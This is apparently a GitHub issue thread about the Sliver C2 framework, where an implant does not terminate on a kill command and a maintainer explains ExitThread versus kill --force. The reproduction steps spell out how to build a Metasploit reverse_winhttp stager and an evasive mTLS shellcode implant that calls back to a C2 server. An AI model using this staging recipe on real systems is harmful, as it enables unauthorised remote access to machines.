Sliver implant doesn't terminate when a kill command is issued

[hypnoticpattern]

Describe the bug
Sending the kill command doesn't terminate the implant.

Looking at the target machine the process keeps running and it sends periodic ping to the C2 server. the sliver-server logs show connection attempts from an unregistered implant. The implant was generated as a shellcode and a metasploit stager was used to execute the payload.

To Reproduce

1. > msfconsole
2. use payload/windows/x64/custom/reverse_winhttp
3. set LHOST [SLIVER_SERVER_IP]
4. set LPORT 8443
5. set LURI home.woff
6. generate -f exe -o /tmp/index.exe
7. exit
8. Move index.exe to the target machine (i.e. Windows Server 2022)
9. sliver-server
10. profiles new --mtls [SLIVER_SERVER_IP]:8080 --format shellcode --evasion mtls-windows-shellcode
11. stage-listener --url http://[SLIVER_SERVER_IP]:8443 --profile mtls-windows-shellcode --prepend-size
12. mtls -l 8080
13. Execute the executable from the Windows machine
14. use [SESSION_ID]
15. kill

Expected behavior
The implant should terminate when the C2 server sends the kill command

Screenshots

Desktop (please complete the following information):

• Sliver server OS: Ubuntu 22.04 LTS
• Sliver server version: 1.5.39
• Sliver implant OS: Windows Server 2022

Additional context
none

[rkervella]

Use kill --force if you want to kill the host process. When running from a shellcode or a shared library, we call ExitThread instead of ExitProcess to avoid inadvertently killing the host process (in case the user injected in an already running process). This is by design.
There might be some incompatibilities between Donut and MSF stagers regarding calls to ExitThread which may cause the behavior you observed (implant still reaching out after a regular kill). I still need to figure that part out.

[rkervella]

Fixed in #1300 / #1302.